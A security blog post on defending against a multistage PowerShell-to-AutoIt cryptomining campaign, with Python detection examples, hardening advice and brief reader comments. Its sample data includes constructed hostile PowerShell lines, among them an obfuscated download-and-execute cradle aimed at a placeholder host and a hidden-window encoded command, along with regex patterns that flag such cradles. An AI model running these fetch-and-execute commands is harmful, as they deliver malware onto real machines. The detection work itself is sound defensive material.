
Defending Against PowerShell-Based Cryptomining Attacks: Security Best Practices for Crypto Users

On September 3, 2025, cybersecurity firm Darktrace published a detailed analysis of a novel cryptomining malware campaign that bypassed conventional security tools through sophisticated PowerShell-based payloads. The incident, detected at a retail and e-commerce company in July 2025, represents the first documented case of the NBMiner cryptominer being delivered via an obfuscated AutoIt loader—highlighting the evolving sophistication of cryptojacking threats in an environment where the total cryptocurrency market capitalization approaches $4 trillion.

The Threat Landscape

Cryptojacking—the unauthorized use of computing resources to mine cryptocurrency—remains one of the most persistent cyber threats in the digital age. Unlike ransomware, which disrupts operations and demands payment, cryptomining malware operates silently, stealing processing power and energy resources to generate profit for attackers. The impact accumulates over time: reduced system performance, shortened hardware lifespans, inflated energy costs, and potential data privacy violations.

The Darktrace incident demonstrates how threat actors are refining their techniques. In July 2025, Darktrace detected a compromised desktop device establishing a connection to a rare endpoint at 45.141.87[.]195 over port 8000 using HTTP. The connection carried a PowerShell user agent string, indicating remote code execution. The URI contained ‘/infect.ps1’—a heavily obfuscated PowerShell script that served as a dropper for an AutoIt loader, which subsequently injected NBMiner into a legitimate system process.

This attack chain—PowerShell script to obfuscated loader to process injection to cryptominer—represents a multistage approach designed to evade signature-based detection at every stage. The global cryptocurrency market cap hovering near $4 trillion makes cryptojacking an increasingly attractive enterprise for threat actors who can monetize stolen compute resources with minimal risk compared to ransomware operations.

Core Principles

Effective defense against cryptomining malware rests on several foundational security principles:

Behavioral Detection Over Signatures: The NBMiner attack bypassed traditional antivirus because the payload was delivered through legitimate scripting languages (PowerShell, AutoIt) and injected into trusted processes. Behavioral analysis tools that monitor for anomalous CPU usage, unusual network connections, and unexpected process spawning are essential for detecting these multi-layered attacks.

Network Monitoring: Darktrace identified the initial compromise by detecting a new PowerShell user agent connecting to a previously unseen external endpoint. Continuous network traffic analysis provides early warning indicators that endpoint solutions alone cannot deliver.
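As an added illustration of the network-level check described above (example code written for this article, not Darktrace's detection logic), the following stacks the incident's indicators, a PowerShell user agent, a destination absent from the traffic baseline, a non-standard web port and a .ps1 URI, over constructed proxy log lines. The log format, the TEST-NET addresses and the baseline set are all assumptions; the user-agent string mirrors the form Windows PowerShell's web cmdlets send.

```python
"""Flag HTTP flows matching the incident shape described above: a PowerShell
user agent reaching an endpoint the network has not talked to before, on a
non-standard web port, fetching a .ps1 resource. Log format, addresses and
sample lines are constructed for this example (TEST-NET ranges)."""
import csv
import io

# Constructed proxy log: time,src,dst,dst_port,method,uri,user_agent
SAMPLE_LOG = """\
2025-07-14T09:01:02Z,10.0.5.21,198.51.100.10,443,GET,/,Mozilla/5.0 (Windows NT 10.0) Chrome/126.0
2025-07-14T09:02:40Z,10.0.5.33,198.51.100.22,443,GET,/api/v1,Mozilla/5.0 (Windows NT 10.0) Chrome/126.0
2025-07-14T09:03:15Z,10.0.5.21,203.0.113.45,8000,GET,/infect.ps1,Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
2025-07-14T09:04:00Z,10.0.5.40,198.51.100.10,80,GET,/update.ps1,Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1
"""

# Destinations seen in the historical baseline (constructed): the two
# hosts the fleet normally talks to. 203.0.113.45 has never been seen.
BASELINE_DESTINATIONS = {"198.51.100.10", "198.51.100.22"}
STANDARD_WEB_PORTS = {"80", "443"}

def parse_log(text):
    fields = ["time", "src", "dst", "dst_port", "method", "uri", "user_agent"]
    return [dict(zip(fields, row)) for row in csv.reader(io.StringIO(text)) if row]

def score_flow(flow, baseline):
    """Return the indicators one flow trips (empty if none). Each mirrors a
    signal from the incident; rarity and port checks only apply once the
    user agent says PowerShell, which keeps browser traffic out entirely."""
    reasons = []
    if "WindowsPowerShell" in flow["user_agent"]:
        reasons.append("powershell-user-agent")
        if flow["dst"] not in baseline:
            reasons.append("rare-external-endpoint")
        if flow["dst_port"] not in STANDARD_WEB_PORTS:
            reasons.append("non-standard-web-port")
        if flow["uri"].lower().endswith(".ps1"):
            reasons.append("script-download")
    return reasons

def detect(text, baseline=BASELINE_DESTINATIONS, min_indicators=3):
    """Alert only when indicators stack. A PowerShell UA pulling a .ps1 from a
    known host on port 80 (an admin update script) trips two and stays quiet;
    the full chain to an unseen host on 8000 trips four and alerts."""
    alerts = []
    for flow in parse_log(text):
        reasons = score_flow(flow, baseline)
        if len(reasons) >= min_indicators:
            alerts.append((flow["src"], flow["dst"], flow["dst_port"], flow["uri"], reasons))
    return alerts
```

The threshold is the tuning knob: a fleet with heavy scripted patching can raise it or extend the baseline, while a fleet that never runs PowerShell web requests can alert on the user agent alone.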

Least Privilege Access: Restricting PowerShell execution rights and limiting script capabilities through Group Policy or application whitelisting significantly reduces the attack surface. Organizations should disable PowerShell remoting where it is not explicitly required and enforce Constrained Language Mode.

Tooling and Setup

Building an effective cryptomining defense requires specific tools and configurations:

  • Endpoint Detection and Response (EDR): Deploy EDR solutions that monitor process behavior, not just file hashes. Look for capabilities like memory scanning, process injection detection, and automated response actions that can isolate compromised endpoints in real time
  • Network Traffic Analysis (NTA): Implement network monitoring tools that baseline normal traffic patterns and flag deviations. Darktrace’s success in this incident demonstrates the value of AI-driven network analysis
  • DNS Filtering: Block connections to known cryptomining pool domains and suspicious infrastructure. Many cryptominers communicate with mining pools on non-standard ports
  • PowerShell Security: Enable PowerShell script block logging, module logging, and transcription. Configure AppLocker or Windows Defender Application Control to restrict script execution to approved sources only
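Once script block logging from the last bullet is on, the records still need triage. The following is an added example (not from the article or any vendor) that scans constructed ScriptBlockText values of the kind Event ID 4104 carries for common obfuscation and staging markers; the three sample blocks, their ids and the 203.0.113.45 address are constructed, not the incident's script.

```python
"""Triage PowerShell script block log records (Event ID 4104 in the
Microsoft-Windows-PowerShell/Operational channel) for common obfuscation and
staging markers. The ScriptBlockText samples below are constructed for this
example and are not the script from the incident."""
import re

# Constructed 4104 ScriptBlockText values: one routine admin command, one
# spliced-string downloader, one encoded command with a hidden window.
SAMPLE_BLOCKS = {
    "block-1": "Get-ChildItem C:\\Logs -Filter *.log | Where-Object Length -gt 1MB",
    "block-2": ("$a='Ne'+'t.Web'+'Cli'+'ent';$b=[char]73+[char]69+[char]88;"
                "IEX(New-Object $a).DownloadString('http://203.0.113.45:8000/x.ps1')"),
    "block-3": "powershell -NoP -W Hidden -EncodedCommand UExBQ0VIT0xERVI=",
}

# One regex per marker. Script block logging records the text at execution
# time, so spliced or encoded stages still surface once they run.
MARKERS = {
    "encoded-command": re.compile(r"(?<!\w)-e(c|nc|ncodedcommand)?\b", re.I),
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "download-cradle": re.compile(r"downloadstring|downloadfile|net\.webclient", re.I),
    "char-casting": re.compile(r"\[char\]\s*\d+", re.I),
    "string-splicing": re.compile(r"'[^']*'\s*\+\s*'"),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

def triage(block_text):
    """Return the names of the markers present in one script block, in the
    order MARKERS defines them."""
    return [name for name, rx in MARKERS.items() if rx.search(block_text)]

def triage_events(blocks, min_markers=2):
    """Map block id -> markers for blocks that trip at least min_markers.
    Requiring two independent markers keeps a lone legitimate IEX or a
    single [char] cast from paging anyone, while still catching the
    spliced downloader and the encoded hidden-window launch."""
    flagged = {}
    for block_id, text in blocks.items():
        hits = triage(text)
        if len(hits) >= min_markers:
            flagged[block_id] = hits
    return flagged
```

Note that block-2 never contains the literal string "Net.WebClient", which is why the splicing and [char] markers matter: they catch the assembly of a name that a plain keyword match would miss.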

Ongoing Vigilance

Cryptomining threats continue to evolve alongside the cryptocurrency market. Several trends demand ongoing attention:

Supply chain attacks represent a growing vector for cryptominer distribution. The npm compromise discovered in September 2025—where attackers phished developer credentials through spoofed domains to inject malicious code into 18 widely-used JavaScript packages—demonstrates how trusted software ecosystems can be weaponized.

Browser-based cryptojacking remains a low-barrier entry point. JavaScript-based mining scripts injected into compromised websites can hijack visitor CPUs without installing any software. Organizations should deploy browser extensions that block known mining scripts and monitor web traffic for CoinHive-style patterns.

The rise of legitimate cryptomining services also creates cover for malicious activity. IT teams should maintain an inventory of authorized mining operations and investigate any cryptomining software or network connections not on the approved list.

Final Takeaway

The Darktrace cryptomining incident illustrates a broader pattern in cybersecurity: attackers exploit the gap between what security tools expect and what actually happens on the network. The PowerShell-to-AutoIt-to-NBMiner delivery chain succeeded because each stage used legitimate tools in malicious ways, evading signature-based detection at every step.

For individual cryptocurrency users, the risk extends beyond organizational networks. Personal devices running wallet software or participating in DeFi protocols are attractive targets for cryptojackers who can mine smaller cryptocurrencies using stolen resources. Users should monitor system performance for unexplained CPU spikes, install reputable endpoint protection, and keep all software updated—basic hygiene that prevents the vast majority of cryptomining infections.

With Bitcoin at approximately $111,700 and Ethereum around $4,450, the economic incentives driving cryptojacking will only intensify. Security practices must evolve at the same pace as the threats they aim to counter.


7 thoughts on “Defending Against PowerShell-Based Cryptomining Attacks: Security Best Practices for Crypto Users”

  1. PowerShell to AutoIt loader to NBMiner injection. three stages and each one designed to evade a different detection layer. clever and nasty

  2. cryptojacking is the silent threat. no ransom note, no disruption, just your electricity bill creeping up while someone mines on your dime
